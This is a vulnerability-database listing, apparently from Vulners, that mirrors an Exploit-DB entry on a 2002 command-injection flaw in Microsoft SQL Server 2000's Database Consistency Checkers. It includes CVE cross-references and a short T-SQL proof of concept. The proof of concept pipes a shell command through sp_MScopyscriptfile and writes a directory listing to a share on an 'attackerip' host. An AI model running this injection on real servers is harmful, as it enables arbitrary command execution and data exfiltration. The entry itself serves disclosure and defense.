Lucene search
+L

Microsoft SQL Server 2000 - Database Consistency Checkers Buffer Overflow

🗓️ 25 Jul 2002 00:00:00Reported by Cesar CerrudoType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Microsoft SQL Server 2000 has buffer overflow vulnerabilities in Database Consistency Checkers.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-0644
26 Jul 200204:00
cve
cvelist
Cvelist
CVE-2002-0644
26 Jul 200204:00
cvelist
euvd
EUVD
EUVD-2002-0638
7 Oct 202500:30
euvd
nessus
Tenable Nessus
MS02-061: Microsoft SQL Server Multiple Vulnerabilities (uncredentialed check)
25 Jan 200300:00
nessus
nvd
NVD
CVE-2002-0644
12 Aug 200204:00
nvd
source: https://www.securityfocus.com/bid/5307/info

Microsoft SQL Server 2000 includes utilities called Database Consistency Checkers (DBCC). Several of these programs contain identical buffer overflows that, when exploited, could allow an attacker to execute arbitrary code with the privilege level of the SQL Server service account.

declare @command varchar(100)
declare @scripfile varchar(200)
set concat_null_yields_null off
select @command='dir c:\ >
"\\attackerip\share\dir.txt"'
select @scripfile='c:\autoexec.bat > nul" | ' +
@command + ' | rd "'
exec sp_MScopyscriptfile @scripfile ,''

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.11419
26